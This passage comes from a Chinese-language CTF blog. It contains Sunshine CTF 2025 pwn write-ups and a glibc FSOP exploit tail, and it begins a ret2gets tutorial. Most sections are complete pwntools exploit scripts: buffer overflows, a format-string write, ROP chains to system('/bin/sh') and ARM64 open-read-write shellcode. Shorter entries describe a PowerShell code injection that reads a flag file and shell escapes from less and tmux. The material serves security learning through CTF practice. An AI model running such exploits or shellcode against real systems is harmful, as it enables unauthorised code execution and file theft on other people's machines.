    case __GCONV_EMPTY_INPUT:
      result = __codecvt_ok;
      break;

    case __GCONV_FULL_OUTPUT:
    case __GCONV_INCOMPLETE_INPUT:
      result = __codecvt_partial;
      break;

    default:
      result = __codecvt_error;
      break;
    }

  return result;
}

那现在问题就变成了，如何控制 rcx 指向 system？调试发现，rcx 的计算过程是可逆的，并且可以控制为任意值。具体流程，需要从 jmp rcx 开始反向溯源，看它是怎么得来的。最终发现，源头来自执行 _IO_wdo_write 时的 lea rcx, [r12 + r13*4]，rcx 从这里被设置后直到执行 __fct 都没有被修改过。

观察这条指令，我们不难想到，控制 rcx 要么就是令 r12 = system, r13 = 0，要么就是令 r12 = 0, r13 = system // 4。继续溯源 r12 发现，它是 rsi，即 (_f)->_wide_data->_IO_write_base。由于后面 overlapping 结构体的时候我用到了这个字段，所以我选择了令 r13 = system // 4，而 r13 也是可控的，为 rdx，即 (_f)->_wide_data->_IO_write_ptr - (_f)->_wide_data->_IO_write_base。

但是直接这样设置发现，并没有得到 system，于是我们继续往上溯源，看一下 rsi 和 rdx 到底是怎么传入的，发现，rdx 其实是被动过手脚的……

但很显然这是一个可逆计算，YAAAY～

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    ROP,
    FileStructure,
    context,
    flat,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", "--local", action="store_true", help="Run locally")
parser.add_argument("-G", "--gdb", action="store_true", help="Enable GDB")
parser.add_argument("-P", "--port", type=int, default=1234, help="GDB port for QEMU")
parser.add_argument("-T", "--threads", type=int, default=None, help="Thread count")
args = parser.parse_args()


FILE = "./main_patched"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc
rop = ROP(libc)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch(argv=None, envp=None):
    global target, thread

    if argv is None:
        argv = [FILE]

    if args.local and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.local:
        if args.gdb and "qemu" in argv[0]:
            if "-g" not in argv:
                argv.insert(1, str(args.port))
                argv.insert(1, "-g")
        target = process(argv, env=envp)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"stdout : ")
    stdout = int(target.recvline(), 16)
    libc.address = stdout - libc.sym["_IO_2_1_stdout_"]
    add_rdi_0x10_jmp_rcx = libc.address + 0x000000000017D690
    system = libc.sym["system"]

    fp = FileStructure(null=stdout + 0x1260)
    fp.flags = 0x8
    fp.unknown2 = flat(
        {
            0x18: 0x1,  # fp->_mode
        },
        filler=b"\x00",
    )
    fp._IO_write_ptr = 1
    fp._IO_write_base = 0
    fp._wide_data = stdout - 0x8
    fp._codecvt = stdout + 0x28  # codecvt
    fp._IO_save_end = stdout + 0x8
    fp._IO_read_base = system // 0x4 << 0x2  # rdx
    fp.markers = stdout + 0x20  # gs->__shlib_handle
    fp._IO_save_base = add_rdi_0x10_jmp_rcx  # gs->__fct
    fp._IO_write_end = b"/bin/sh\x00"

    raw_input("DEBUG")
    target.send(bytes(fp))

    target.interactive()


if __name__ == "__main__":
    main()

Flag

复现。

分岔的森林：angr 符号执行札记

Wed, 01 Oct 2025 00:00:00 GMT

前言

前几天打了 SunshineCTF 2025，其中有道 MOVfuscated 的 Pwn 题感觉挺有意思，虽然最后也没做出来，但是知道了一个大致的学习方向，或许可以用符号执行来解决这道题。

Anyway，先开个题，至于什么时候写，hmm，我还有好多 heap 没学泪，所以这是一篇札记（

Write-ups: Sunshine CTF 2025

Mon, 29 Sep 2025 00:00:00 GMT

i95

这个方向都是栈 Pwn，很简单，直接 AK 了。

Miami

Information

Category: Pwn
Points: 100

Description

Dexter is the prime suspect of being the Bay Harbor Butcher, we break into his login terminal and get the proof we need!

Write-up

覆盖变量值即可。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./miami"
HOST, PORT = "chal.sunshinectf.games", 25601

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    payload = flat(
        b"A" * 0x4C,
        0x1337C0DE,
    )
    raw_input("DEBUG")
    target.sendlineafter(b"Enter Dexter's password: ", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[sun{DeXtEr_was_!nnocent_Do4kEs_w4s_the_bAy_hRrb0ur_bu7cher_afterall!!}]

Jupiter

Information

Category: Pwn
Points: 100

Description

Jupiter just announced their new Brightline junction... the ECHO TERMINAL!!!

Write-up

dprintf(2, (const char *)buf)，明显格式化字符串，改 secret_key == 322420958 即可，后两字节没问题，直接改高字节。

Exploit

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    context,
    flat,
    p64,
    process,
    raw_input,
    remote,
)

FILE = "./jupiter"
HOST, PORT = "chal.sunshinectf.games", 25607

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    secret = 0x404010
    payload = flat(
        b"aaaaa%4914c%7$hn",
        p64(secret + 0x2),
    )
    raw_input("DEBUG")
    target.sendlineafter(b"Enter data at your own risk: ", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[sun{F0rmat_str!ngs_4re_sup3r_pOwerFul_r1gh7??}]

Canaveral

Information

Category: Pwn
Points: 100

Description

NASA Mission Control needs your help... only YOU can enter the proper launch sequence!!

Write-up

这题有点爆炸，一开始自己在 bss 上写 /bin/sh 字符串，远程老打不通，调试发现它会把我写的字符串清空……后来用程序自带的 /bin/sh 字符串地址就打通了，目前还没搞明白为什么自己写的不行，日后有空再研究。

Exploit - I

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./canaveral"
HOST, PORT = "chal.sunshinectf.games", 25603

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    read = 0x401289
    system = 0x401218
    payload = flat(
        b"A" * 0x40,
        elf.bss() + 0xF00,
        read,
    )
    raw_input("DEBUG")
    target.sendlineafter("Enter the launch sequence: ", payload)

    payload = flat(
        b"A" * 0x38,
        next(elf.search(b"/bin/sh")),
        0x404F28,
        system,
    )
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

Exploit - II

下面是自己构造 /bin/sh 的成功版，我发现只要把自己构造的 /bin/sh 和调用 system 的 ROP Chain 写在相同的区域，libc 内部就会破坏 /bin/sh，那干脆试试写到别的地方去，比如这里写入到栈中（注意栈上也会因为重叠问题，导致部分输入被破坏，不过还是有没被破坏的地方可以用的）：

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./canaveral"
HOST, PORT = "chal.sunshinectf.games", 25603

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    read = 0x401289
    system = 0x401218
    payload = flat(
        b"A" * 0x18,
        b"/bin/sh\x00",
        b"A" * 0x20,
        elf.bss() + 0xF00,
        read,
    )
    raw_input("DEBUG")
    target.sendlineafter("Enter the launch sequence: ", payload)
    target.recvuntil(b"prize: ")
    stack = int(target.recvline().strip(), 16)
    binsh = stack + 0x18
    target.success(hex(stack))

    payload = flat(
        b"A" * 0x38,
        binsh,
        0x404F28,
        system,
    )
    target.sendline(payload)
    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[sun{D!d_y0u_s3e_thE_IM4P_spAce_laUncH??}]

Jacksonville

Information

Category: Pwn
Points: 100

Description

The Jacksonville Jaguars are having a rough season, let's cheer them on!!

Write-up

First Blood! 没难度，就是平台在开玩笑，拿到 flag 了提交上去告诉我不对……然后我疯狂按提交按钮结果就成功了……

Exploit

#!/usr/bin/env python3

from pwn import (
    ROP,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "./jacksonville"
HOST, PORT = "chal.sunshinectf.games", 25602

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
rop = ROP(elf)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    answer = b"aaaaaaJaguars\x00"
    length = len(answer)

    payload = flat(
        answer,
        b"A" * (0x68 - length),
        rop.ret.address,
        elf.sym["win"],
    )
    raw_input("DEBUG")
    target.sendlineafter(b"> ", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Flag

:spoiler[sun{D!d_y0u_s3e_thE_IM4P_spAce_laUncH??}]

Daytona

Information

Category: Pwn
Points: 100

Description

Cops don't like it when you drive like you're in the Daytona 500 :/

Write-up

<s>这可是我的第一次。</s>

bro 第一次做（成） arm 架构 pwn，虽然最后还是自己提供思路，让 AI 写的 shellcode……嗯，这次不算数～

一开始直接 shellcraft 打 execve，结果本地通了远程不行，后来试了下换成 ORW，还是本地可以，远程不行……最后才知道，ARM 架构的 CPU 通常有分离的数据缓存 (D-Cache) 和指令缓存 (I-Cache)，我们写入 shellcode 的而时候数据先进入 D-Cache，跳转到这段代码时，CPU 还是会继续从 I-Cache 中读取指令。如果 CPU 流水线和 I-Cache 中仍然存有这段内存地址上的旧代码，它就会执行错误的代码，所以我远程打不通。本地能通是因为 QEMU 通常会自动处理缓存同步问题。

解决方法是使用一个叫做 Cache Invalidation Gadget 的东西，手动刷新流水线：

dc：清理 D-Cache，将新写入的 shellcode 推送到主存
ic + isb：清理 I-Cache 和 CPU 流水线，强制 CPU 从内存中加载新写入的 shellcode，从而保证 shellcode 能够正确执行

得抽空去学一下其它架构的指令集了，不然真不行，这是我最近碰到的第二个 arm pwn 了。

Exploit

#!/usr/bin/env python3

from pwn import (
    args,
    asm,
    context,
    flat,
    process,
    raw_input,
    remote,
    shellcraft,
)


FILE = "./daytona"
HOST, PORT = "chal.sunshinectf.games", 25606

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def launch():
    global target
    if args.L:
        # target = process(["qemu-aarch64", "-g", "1234", FILE])
        target = process(["qemu-aarch64", FILE])
    else:
        target = remote(HOST, PORT)


def main():
    launch()

    target.recvuntil(b"The cops said I was going ")
    stack = int(target.recvuntil(b" ").strip(), 10) + 117
    target.success(f"stack: {hex(stack)}")

    # shellcode = asm(shellcraft.execve("/bin/sh", 0, 0))
    # shellcode = shellcraft.open("flag.txt", 0, 0)
    # shellcode += shellcraft.sendfile(1, "x0", 0, 0x1000)

    shellcode = asm("""
        // cache invalidation gadget
        adr x9, orw
        dc cvau, x9
        add x10, x9, #0x40
        dc cvau, x10
        dsb ish
        ic ivau, x9
        ic ivau, x10
        dsb ish
        isb

    orw:
        // openat(dfd=AT_FDCWD, filename="flag.txt", flags=0, mode=0)
        // AT_FDCWD = 0xFFFFFFFFFFFFFF9C (-100)
        mov x0, #-100
        adr x1, filename
        mov x2, #0
        mov x3, #0
        mov x8, #56
        svc #0

        // sendfile(out_fd=1, in_fd=X0, offset=0, count=0x1000)
        mov x1, x0
        mov x0, #1
        mov x2, #0
        mov x3, #0x100
        mov x8, #71
        svc #0

    filename:
        .ascii "flag.txt\\x00"
    """)

    length = len(shellcode)
    target.warn(f"shellcode length: {hex(length)}")

    payload = flat(
        b"A" * 0x48,
        stack + 0x48 + 0x8,
        shellcode,
    )
    raw_input("DEBUG")
    target.sendlineafter(b"What do I tell them??", payload)

    target.interactive()


if __name__ == "__main__":
    main()

Exploit

:spoiler[sun{ARM64_shEl1c0de_!s_pr3ttY_n3a7_dOnT_y0u_thInk?}]

Pwn

这个方向真的是 Pwn 吗，怎么题目都那么奇怪？？

HAL9000 是一道贼恶心的 mov obfuscated 的题，demovfuscator 了以后和原先也区别不大，还是一堆 mov 指令，坐牢啊……

Space Is Less Than Ideal 和 Space Is My Banner 感觉这两道更像 Misc，与 Pwn 一点关系都没有……

AstroJIT AI 是代码审计吧，也和 Pwn 没关系啊……

唯一一个 heap 我还因为没怎么学过堆，做不来……

Clone Army 没细看，后面有空复现吧。

AstroJIT AI

Information

Category: Pwn
Points: 500

Description

AstroJIT AI, your new general-purpose chatbot for the future!

Write-up

测试格式化字符串，报错：

问 AI，可以注入代码，直接用 { int.Parse(System.IO.File.ReadAllText("flag.txt")), 0, 0 }，由于 flag 内容不是整数，报错信息直接把 flag 输出了。

Weights: { int.Parse(System.IO.File.ReadAllText("flag.txt")), 0, 0 }
{ int.Parse(System.IO.File.ReadAllText("flag.txt")), 0, 0 }
MethodInvocationException: /app/evil_corp_ai.ps1:424
Line |
 424 |              $weights = [Two.Second.Scholars.Mass.And.Partialities.Wei …
     |              ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     | Exception calling "CalculatePrecompiledWeights" with "0" argument(s):
     | "The input string
     | 'sun{evil-corp-one-uprising-at-a-time-folks-may-be-evil-but-do-not-get-burnt-out-just-burn-the-building-down-before-you-go-we-need-the-insurance-money} ' was not in a correct format."

Flag

:spoiler[sun{evil-corp-one-uprising-at-a-time-folks-may-be-evil-but-do-not-get-burnt-out-just-burn-the-building-down-before-you-go-we-need-the-insurance-money}]

Space Is Less Than Ideal

Information

Category: Pwn
Points: 500

Description

I think i did a thing. I may have accessed a satellite. I can access the logs anyhow. I can't seem to access anything else. I know I've seen that type of log viewer before, but something seems... different... about it. Well you know the expression. Less is more!

Write-up

less 逃逸，调教 AI 就好了。先输入 ma 设置 mark，然后输入 |a 就可以执行指令。ls 发现有 cat-flag，重复上面的步骤调用这个程序就好了。

另外，刚开始测试 !command 发现没有用，但是可以看到后台指令执行结果，所以要看结果的时候可以通过这个方式查看。

Flag

:spoiler[sun{less-is-more-no-really-it-is-just-a-symbolic-link}]

Space Is My Banner

Information

Category: Pwn
Points: 500

Description

I did it again. This time I'm sure I accessed a satellite. I'm scared, it's giving me a warning message when I log in. I think this time I may have gone too far... this seems to be some top security stuff...

Write-up

这次是 tmux 逃逸，在 Security Prompt 中按 Ctrl-B 然后输入 : 就可以输入一些内置 tmux 指令了，直接用核武 :run-shell "ls -al" 然后 :run-shell "./cat-flag"。

Flag

:spoiler[sun{wait-wait-wait-you-cannot-hack-me-you-agreed-to-not-do-that-that-is-not}]

无 gadgets 也能翻盘：ret2gets 能否成为核武器？

Fri, 26 Sep 2025 00:00:00 GMT

ret2gets 是用于在 glibc >= 2.34 没有常用 gadgets，控制不了任何参数的情况下，通过调用 gets，配合 printf / puts 等输出函数实现 ld 地址泄漏进而为深入构造 ROP Chain 做准备的 trick 。

:::tip 此 trick 适用于 GLIBC >= 2.34，<= 2.41 的 ROP Chain 构造。 :::

直接上 demo，这里使用的 GLIBC 版本是 2.41-6ubuntu1_amd64：

// gcc -Wall vuln.c -o vuln -no-pie -fno-stack-protector -std=c99

#include <stdio.h>

int main() {
  char buf[0x20];
  puts("ROP me if you can!");
  gets(buf);

  return 0;
}

:::important gets 函数在 C11 中被移除，所以我们编译的时候需要手动指定一个低于 C11 的标准，比如这里指定了 C99。 :::

如果我们使用 ropper 或者其它同类工具，列出这个程序中包含的 gadgets，我们会发现它并没有常用于控制参数的 gadgets，我们什么参数也控制不了。

Gadgets
=======


0x000000000040106c: adc dword ptr [rax], eax; call qword ptr [rip + 0x2f53]; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x000000000040106b: adc dword ptr ss:[rax], eax; call qword ptr [rip + 0x2f53]; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x0000000000401070: adc eax, 0x2f53; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x000000000040109c: adc ecx, dword ptr [rax - 0x75]; add eax, 0x2f2c; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x000000000040110c: adc edx, dword ptr [rbp + 0x48]; mov ebp, esp; call 0x3090; mov byte ptr [rip + 0x2f03], 1; pop rbp; ret;
0x0000000000401074: add ah, dh; nop word ptr cs:[rax + rax]; endbr64; ret;
0x000000000040106e: add bh, bh; adc eax, 0x2f53; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x000000000040100e: add byte ptr [rax - 0x7b], cl; sal byte ptr [rdx + rax - 1], 0xd0; add rsp, 8; ret;
0x000000000040107c: add byte ptr [rax], al; add byte ptr [rax], al; endbr64; ret;
0x000000000040115a: add byte ptr [rax], al; add byte ptr [rax], al; leave; ret;
0x000000000040115b: add byte ptr [rax], al; add cl, cl; ret;
0x000000000040100d: add byte ptr [rax], al; test rax, rax; je 0x3016; call rax;
0x000000000040100d: add byte ptr [rax], al; test rax, rax; je 0x3016; call rax; add rsp, 8; ret;
0x00000000004010a2: add byte ptr [rax], al; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x00000000004010a2: add byte ptr [rax], al; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax; ret;
0x00000000004010e4: add byte ptr [rax], al; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x000000000040107e: add byte ptr [rax], al; endbr64; ret;
0x0000000000401073: add byte ptr [rax], al; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x000000000040115c: add byte ptr [rax], al; leave; ret;
0x00000000004010f6: add byte ptr [rax], al; ret;
0x00000000004010f5: add byte ptr [rax], r8b; ret;
0x000000000040109a: add byte ptr [rbx + rdx + 0x48], dh; mov eax, dword ptr [rip + 0x2f2c]; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x0000000000401099: add byte ptr [rbx + rdx + 0x48], sil; mov eax, dword ptr [rip + 0x2f2c]; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x000000000040111b: add byte ptr [rcx], al; pop rbp; ret;
0x00000000004010e3: add byte ptr cs:[rax], al; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x000000000040115d: add cl, cl; ret;
0x000000000040106d: add dil, dil; adc eax, 0x2f53; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x00000000004010e1: add eax, 0x2efa; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x000000000040109f: add eax, 0x2f2c; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x000000000040100a: add eax, 0x2fc9; test rax, rax; je 0x3016; call rax;
0x000000000040100a: add eax, 0x2fc9; test rax, rax; je 0x3016; call rax; add rsp, 8; ret;
0x0000000000401017: add esp, 8; ret;
0x0000000000401016: add rsp, 8; ret;
0x0000000000401154: call 0x3040; mov eax, 0; leave; ret;
0x0000000000401111: call 0x3090; mov byte ptr [rip + 0x2f03], 1; pop rbp; ret;
0x000000000040106f: call qword ptr [rip + 0x2f53]; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x0000000000401014: call rax;
0x0000000000401014: call rax; add rsp, 8; ret;
0x0000000000401006: in al, dx; or byte ptr [rax - 0x75], cl; add eax, 0x2fc9; test rax, rax; je 0x3016; call rax;
0x0000000000401012: je 0x3016; call rax;
0x0000000000401012: je 0x3016; call rax; add rsp, 8; ret;
0x00000000004010a7: je 0x30b0; mov edi, 0x404020; jmp rax;
0x00000000004010a7: je 0x30b0; mov edi, 0x404020; jmp rax; ret;
0x000000000040109b: je 0x30b0; mov rax, qword ptr [rip + 0x2f2c]; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x00000000004010e9: je 0x30f8; mov edi, 0x404020; jmp rax;
0x00000000004010e9: je 0x30f8; mov edi, 0x404020; jmp rax; nop word ptr [rax + rax]; ret;
0x00000000004010dd: je 0x30f8; mov rax, qword ptr [rip + 0x2efa]; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x00000000004010ae: jmp rax;
0x00000000004010f0: jmp rax; nop word ptr [rax + rax]; ret;
0x00000000004010ae: jmp rax; ret;
0x000000000040114e: lea eax, [rbp - 0x20]; mov rdi, rax; call 0x3040; mov eax, 0; leave; ret;
0x000000000040114d: lea rax, [rbp - 0x20]; mov rdi, rax; call 0x3040; mov eax, 0; leave; ret;
0x0000000000401116: mov byte ptr [rip + 0x2f03], 1; pop rbp; ret;
0x0000000000401159: mov eax, 0; leave; ret;
0x00000000004010e0: mov eax, dword ptr [rip + 0x2efa]; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x000000000040109e: mov eax, dword ptr [rip + 0x2f2c]; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x0000000000401009: mov eax, dword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax;
0x0000000000401009: mov eax, dword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax; add rsp, 8; ret;
0x000000000040110f: mov ebp, esp; call 0x3090; mov byte ptr [rip + 0x2f03], 1; pop rbp; ret;
0x0000000000401069: mov edi, 0x401136; call qword ptr [rip + 0x2f53]; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x00000000004010a9: mov edi, 0x404020; jmp rax;
0x00000000004010eb: mov edi, 0x404020; jmp rax; nop word ptr [rax + rax]; ret;
0x00000000004010a9: mov edi, 0x404020; jmp rax; ret;
0x0000000000401152: mov edi, eax; call 0x3040; mov eax, 0; leave; ret;
0x00000000004010df: mov rax, qword ptr [rip + 0x2efa]; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x000000000040109d: mov rax, qword ptr [rip + 0x2f2c]; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x0000000000401008: mov rax, qword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax;
0x0000000000401008: mov rax, qword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax; add rsp, 8; ret;
0x000000000040110e: mov rbp, rsp; call 0x3090; mov byte ptr [rip + 0x2f03], 1; pop rbp; ret;
0x0000000000401068: mov rdi, 0x401136; call qword ptr [rip + 0x2f53]; hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x0000000000401151: mov rdi, rax; call 0x3040; mov eax, 0; leave; ret;
0x0000000000401078: nop dword ptr [rax + rax]; endbr64; ret;
0x00000000004010f3: nop dword ptr [rax + rax]; ret;
0x0000000000401077: nop dword ptr cs:[rax + rax]; endbr64; ret;
0x00000000004010f2: nop word ptr [rax + rax]; ret;
0x0000000000401076: nop word ptr cs:[rax + rax]; endbr64; ret;
0x0000000000401007: or byte ptr [rax - 0x75], cl; add eax, 0x2fc9; test rax, rax; je 0x3016; call rax;
0x000000000040111d: pop rbp; ret;
0x000000000040110d: push rbp; mov rbp, rsp; call 0x3090; mov byte ptr [rip + 0x2f03], 1; pop rbp; ret;
0x0000000000401042: ret 0x2f;
0x0000000000401011: sal byte ptr [rdx + rax - 1], 0xd0; add rsp, 8; ret;
0x00000000004010de: sbb dword ptr [rax - 0x75], ecx; add eax, 0x2efa; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x00000000004010a0: sub al, 0x2f; add byte ptr [rax], al; test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x0000000000401165: sub esp, 8; add rsp, 8; ret;
0x0000000000401005: sub esp, 8; mov rax, qword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax;
0x0000000000401164: sub rsp, 8; add rsp, 8; ret;
0x0000000000401004: sub rsp, 8; mov rax, qword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax;
0x000000000040107a: test byte ptr [rax], al; add byte ptr [rax], al; add byte ptr [rax], al; endbr64; ret;
0x0000000000401010: test eax, eax; je 0x3016; call rax;
0x0000000000401010: test eax, eax; je 0x3016; call rax; add rsp, 8; ret;
0x00000000004010a5: test eax, eax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x00000000004010a5: test eax, eax; je 0x30b0; mov edi, 0x404020; jmp rax; ret;
0x00000000004010e7: test eax, eax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x00000000004010e7: test eax, eax; je 0x30f8; mov edi, 0x404020; jmp rax; nop word ptr [rax + rax]; ret;
0x000000000040100f: test rax, rax; je 0x3016; call rax;
0x000000000040100f: test rax, rax; je 0x3016; call rax; add rsp, 8; ret;
0x00000000004010a4: test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax;
0x00000000004010a4: test rax, rax; je 0x30b0; mov edi, 0x404020; jmp rax; ret;
0x00000000004010e6: test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x00000000004010e6: test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax; nop word ptr [rax + rax]; ret;
0x00000000004010e2: cli; add byte ptr cs:[rax], al; test rax, rax; je 0x30f8; mov edi, 0x404020; jmp rax;
0x0000000000401163: cli; sub rsp, 8; add rsp, 8; ret;
0x0000000000401003: cli; sub rsp, 8; mov rax, qword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax;
0x0000000000401083: cli; ret;
0x0000000000401160: endbr64; sub rsp, 8; add rsp, 8; ret;
0x0000000000401000: endbr64; sub rsp, 8; mov rax, qword ptr [rip + 0x2fc9]; test rax, rax; je 0x3016; call rax;
0x0000000000401080: endbr64; ret;
0x0000000000401075: hlt; nop word ptr cs:[rax + rax]; endbr64; ret;
0x000000000040115e: leave; ret;
0x000000000040111f: nop; ret;
0x000000000040101a: ret;

111 gadgets found

这是因为原先的这些控制寄存器的 gadgets 都是来自于 __libc_csu_init，而现在这个函数因为包含了易于构造 ROP Chain 的 gadgets，在 GLIBC 2.34 中已经被 patch 了，导致我们现在很难再找到有用的 gadgets 。

这里我们在调用 gets 的地方下断点，执行 gets 之前 rdi 指向的是 buf 的栈地址，ni，随便输入什么后，发现 rdi 寄存器变成了 *RDI 0x7ffff7e137c0 (_IO_stdfile_0_lock) ◂— 0：

定位一下，发现该结构体位于 libc 后的 rw 匿名映射段中：

pwndbg> vmmap $rdi
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File (set vmmap-prefer-relpaths on)
    0x7ffff7e11000     0x7ffff7e13000 rw-p     2000 210000 libc.so.6
►   0x7ffff7e13000     0x7ffff7e20000 rw-p     d000      0 [anon_7ffff7e13] +0x7c0
    0x7ffff7fb4000     0x7ffff7fb9000 rw-p     5000      0 [anon_7ffff7fb4]
pwndbg> x/10gx $rdi
0x7ffff7e137c0 <_IO_stdfile_0_lock>: 0x0000000000000000 0x0000000000000000
0x7ffff7e137d0 <__pthread_force_elision>: 0x0000000000000000 0x0000000000000000
0x7ffff7e137e0 <__attr_list_lock>: 0x0000000000000000 0x0000000000000000
0x7ffff7e137f0 <init_sigcancel>: 0x0000000000000000 0x0000000000000000
0x7ffff7e13800 <__nptl_threads_events>: 0x0000000000000000 0x0000000000000000

此时如果我们再次调用 gets，我们就可以覆盖从 _IO_stdfile_0_lock 开始的数据，这可能会产生一些攻击面。

这里我们先研究我们已经获得的 _IO_stdfile_0_lock。

_IO_stdfile_0_lock

首先简单介绍一下 _IO_stdfile_0_lock 是什么，从名字上看，我们就能猜到它是一把「锁」，肯定是用于多线程安全的，实际上也确实如此，它主要用于锁住 FILE。

由于 glibc 支持多线程，许多函数实现需要线程安全。如果存在多个线程可以同时使用同一个 FILE 结构，那么当有两个线程尝试同时使用一个 FILE 结构时，就会产生条件竞争，可能会破坏 FILE 结构。解决方案就是加锁。

:::tip 基于 glibc-2.41 的源码。 :::

char *
_IO_gets (char *buf)
{
  size_t count;
  int ch;
  char *retval;

  _IO_acquire_lock (stdin);
  ch = _IO_getc_unlocked (stdin);
  if (ch == EOF)
    {
      retval = NULL;
      goto unlock_return;
    }
  if (ch == '\n')
    count = 0;
  else
    {
      /* This is very tricky since a file descriptor may be in the
  non-blocking mode. The error flag doesn't mean much in this
  case. We return an error only when there is a new error. */
      int old_error = stdin->_flags & _IO_ERR_SEEN;
      stdin->_flags &= ~_IO_ERR_SEEN;
      buf[0] = (char) ch;
      count = _IO_getline (stdin, buf + 1, INT_MAX, '\n', 0) + 1;
      if (stdin->_flags & _IO_ERR_SEEN)
 {
   retval = NULL;
   goto unlock_return;
 }
      else
 stdin->_flags |= old_error;
    }
  buf[count] = 0;
  retval = buf;
unlock_return:
  _IO_release_lock (stdin);
  return retval;
}

weak_alias (_IO_gets, gets)

link_warning (gets, "the `gets' function is dangerous and should not be used.")

函数开始时使用 _IO_acquire_lock 获取锁，结束时使用 _IO_release_lock 释放锁。获取锁会告知其它线程 stdin 当前正在被使用中，所以其余任何尝试访问 stdin 的线程都将被强制等待，直到该线程释放锁后，其它线程才可以获取锁。

因此，FILE 有一个 _lock 字段，它是一个指向 _IO_lock_t 的指针：

struct _IO_FILE;
struct _IO_marker;
struct _IO_codecvt;
struct _IO_wide_data;

/* During the build of glibc itself, _IO_lock_t will already have been
   defined by internal headers.  */
#ifndef _IO_lock_t_defined
typedef void _IO_lock_t;
#endif

/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;  /* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr; /* Current read pointer */
  char *_IO_read_end; /* End of get area. */
  char *_IO_read_base; /* Start of putback+get area. */
